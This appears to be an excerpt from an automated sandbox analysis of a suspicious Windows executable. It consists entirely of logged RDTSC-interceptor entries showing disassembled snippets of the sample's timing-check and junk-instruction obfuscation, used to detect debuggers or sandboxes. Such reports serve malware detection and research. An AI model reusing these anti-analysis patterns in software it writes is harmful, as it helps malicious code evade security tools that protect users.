Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 1521ADA second address: 1521AE0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 1521AE0 second address: 1521AED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F8C6D17D0A6h 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 1521AED second address: 1521B07 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F8C6CC64796h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 1521B07 second address: 1521B0B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 1521B0B second address: 1521B11 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 1529851 second address: 1529855 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 1529855 second address: 1529859 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 1527750 second address: 152775C instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F8C6D17D0A6h 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 152775C second address: 1527761 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 1527761 second address: 1527778 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push ecx 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 pop ecx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push esi 0x0000000e push ecx 0x0000000f pop ecx 0x00000010 je 00007F8C6D17D0A6h 0x00000016 pop esi 0x00000017 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 1527778 second address: 1527790 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007F8C6CC64791h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 15278C8 second address: 15278D4 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F8C6D17D0A6h 0x00000008 push eax 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 15278D4 second address: 15278DA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 15278DA second address: 15278DE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 1527D37 second address: 1527D3B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 1527D3B second address: 1527D41 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 1527D41 second address: 1527D4B instructions: 0x00000000 rdtsc 0x00000002 jc 00007F8C6CC6478Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 1528056 second address: 152805A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 15289E6 second address: 1528A00 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F8C6CC64786h 0x00000008 push eax 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push esi 0x0000000d jno 00007F8C6CC64786h 0x00000013 pop esi 0x00000014 popad 0x00000015 push ebx 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 1528A00 second address: 1528A04 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 1528A04 second address: 1528A0A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 1528F4B second address: 1528F51 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 1528F51 second address: 1528F70 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F8C6CC64799h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 1528F70 second address: 1528F74 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 1528F74 second address: 1528F7A instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 15294B9 second address: 15294CD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jng 00007F8C6D17D0A6h 0x0000000e jnp 00007F8C6D17D0A6h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 15294CD second address: 15294E0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8C6CC6478Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 15294E0 second address: 15294E7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 152E26B second address: 152E26F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 152D4F0 second address: 152D507 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8C6D17D0ACh 0x00000009 jp 00007F8C6D17D0A6h 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 152D783 second address: 152D787 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 152D787 second address: 152D7A5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F8C6D17D0B8h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 152D7A5 second address: 152D7AA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 152D933 second address: 152D950 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8C6D17D0B9h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 152DFE8 second address: 152E02C instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F8C6CC64788h 0x00000008 jmp 00007F8C6CC64798h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 push edx 0x00000011 push ecx 0x00000012 pop ecx 0x00000013 jmp 00007F8C6CC6478Eh 0x00000018 pop edx 0x00000019 pushad 0x0000001a jmp 00007F8C6CC6478Ah 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 152FA41 second address: 152FA60 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8C6D17D0B1h 0x00000007 jg 00007F8C6D17D0A6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 152FA60 second address: 152FA64 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 15343DE second address: 15343FB instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pushad 0x00000004 popad 0x00000005 push ebx 0x00000006 pop ebx 0x00000007 pop esi 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b jmp 00007F8C6D17D0AEh 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 15343FB second address: 1534409 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8C6CC6478Ah 0x00000009 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 1534409 second address: 153441C instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F8C6D17D0A6h 0x00000008 jc 00007F8C6D17D0A6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 153441C second address: 1534426 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 push ebx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 1534426 second address: 153442C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 153A87E second address: 153A884 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 153ACCD second address: 153ACEB instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jp 00007F8C6D17D0A6h 0x00000010 jmp 00007F8C6D17D0AEh 0x00000015 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 153ACEB second address: 153ACF3 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 153AEC0 second address: 153AEC6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 153AFE1 second address: 153AFEB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 153AFEB second address: 153AFF4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 153AFF4 second address: 153AFF8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 153B151 second address: 153B15D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 push eax 0x00000007 pop eax 0x00000008 popad 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 153B15D second address: 153B169 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F8C6CC64786h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 153B825 second address: 153B834 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F8C6D17D0ABh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 1539E3E second address: 1539E83 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pushad 0x00000004 popad 0x00000005 pop edx 0x00000006 jmp 00007F8C6CC64790h 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 pushad 0x00000011 popad 0x00000012 jmp 00007F8C6CC6478Bh 0x00000017 pop eax 0x00000018 jnc 00007F8C6CC6479Ch 0x0000001e rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 1543719 second address: 154371E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 154371E second address: 1543724 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 154331D second address: 154332A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 jc 00007F8C6D17D0B2h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 154332A second address: 1543330 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 15525DE second address: 15525E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 15525E3 second address: 15525F5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 jmp 00007F8C6CC6478Ch 0x0000000b rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 15525F5 second address: 1552626 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F8C6D17D0A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push ebx 0x0000000d jmp 00007F8C6D17D0ACh 0x00000012 push esi 0x00000013 jmp 00007F8C6D17D0B5h 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 155533E second address: 1555367 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8C6CC64794h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F8C6CC6478Dh 0x00000010 push edi 0x00000011 pop edi 0x00000012 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 155B2E0 second address: 155B2E6 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 156358C second address: 15635A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F8C6CC64790h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 156AF1B second address: 156AF21 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 156AF21 second address: 156AF59 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 push esi 0x00000008 pop esi 0x00000009 jmp 00007F8C6CC64792h 0x0000000e pop edx 0x0000000f jmp 00007F8C6CC64791h 0x00000014 popad 0x00000015 pushad 0x00000016 pushad 0x00000017 jl 00007F8C6CC64786h 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 156B0FE second address: 156B107 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 pushad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 156B41F second address: 156B454 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8C6CC64796h 0x00000009 jmp 00007F8C6CC64799h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 156B86F second address: 156B87A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnc 00007F8C6D17D0A6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 156B87A second address: 156B89B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pushad 0x00000008 jmp 00007F8C6CC64796h 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 156B89B second address: 156B8B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8C6D17D0ACh 0x00000009 ja 00007F8C6D17D0A6h 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 push edx 0x00000013 pop edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 1570257 second address: 157025B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 157025B second address: 1570265 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 1570265 second address: 157026B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 157026B second address: 1570271 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 1570271 second address: 157027B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 157027B second address: 157027F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 156FDAA second address: 156FDB2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 156FDB2 second address: 156FDB8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 156FDB8 second address: 156FDC1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 156FDC1 second address: 156FDC5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 156FF0C second address: 156FF10 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 156FF10 second address: 156FF16 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 156FF16 second address: 156FF32 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F8C6CC6479Eh 0x00000008 jmp 00007F8C6CC64792h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 156FF32 second address: 156FF4C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push ecx 0x00000008 jmp 00007F8C6D17D0B0h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 156FF4C second address: 156FF7B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 jmp 00007F8C6CC64798h 0x0000000a ja 00007F8C6CC64788h 0x00000010 push edi 0x00000011 pop edi 0x00000012 jnp 00007F8C6CC6478Eh 0x00000018 push ebx 0x00000019 pop ebx 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 15A785A second address: 15A786E instructions: 0x00000000 rdtsc 0x00000002 jns 00007F8C6D17D0A6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jng 00007F8C6D17D0ACh 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 15A786E second address: 15A7877 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push edx 0x00000006 pop edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 15AF642 second address: 15AF66F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8C6D17D0ABh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007F8C6D17D0B6h 0x0000000f pop eax 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 15AF66F second address: 15AF674 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 15B533E second address: 15B5361 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F8C6D17D0A8h 0x00000008 pushad 0x00000009 push edx 0x0000000a pop edx 0x0000000b jmp 00007F8C6D17D0B2h 0x00000010 pushad 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 15C36B8 second address: 15C36BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 15C3535 second address: 15C3547 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F8C6D17D0A6h 0x0000000a popad 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 15C3547 second address: 15C354B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 15C354B second address: 15C3562 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 jmp 00007F8C6D17D0ACh 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 15C3562 second address: 15C356F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b push edx 0x0000000c pop edx 0x0000000d rdtsc
